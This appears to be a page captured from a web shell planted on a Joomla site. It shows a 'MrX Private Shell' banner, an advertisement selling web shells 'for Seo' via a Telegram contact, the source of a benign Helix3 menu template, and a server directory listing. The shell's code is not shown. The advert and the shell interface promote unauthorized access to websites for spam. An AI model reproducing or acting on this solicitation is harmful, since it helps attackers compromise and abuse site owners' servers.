__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Helix3 Framework
* @author JoomShaper https://www.joomshaper.com
* @copyright (c) 2010 - 2021 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
use Joomla\CMS\HTML\HTMLHelper;
defined('_JEXEC') or die;
$title = $item->anchor_title ? ' title="' . $item->anchor_title . '"' : '';
$anchor_css = $item->anchor_css ? $item->anchor_css : '';
$linktype = $item->title;
if ($item->menu_image)
{
$linktype = HTMLHelper::_('image', $item->menu_image, $item->title);
if ($item->getParams()->get('menu_text', 1))
{
$linktype .= '<a class="image-title">' . $item->title . '</a>';
}
}
?>
<a class="separator <?php echo $anchor_css; ?>"<?php echo $title; ?>><?php echo $linktype; ?></a>
<?php
if(($module->position == 'offcanvas') && ($item->deeper)) {
echo '<span class="offcanvas-menu-toggler collapsed" data-bs-toggle="collapse" data-bs-target="#collapse-menu-'. $item->id .'"><i class="open-icon fa fa-angle-down"></i><i class="close-icon fa fa-angle-up"></i></span>';
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 2.31 KB | 0664 |
|
| default_component.php | File | 1.9 KB | 0664 |
|
| default_heading.php | File | 1.02 KB | 0664 |
|
| default_separator.php | File | 1.02 KB | 0664 |
|
| default_url.php | File | 2.25 KB | 0664 |
|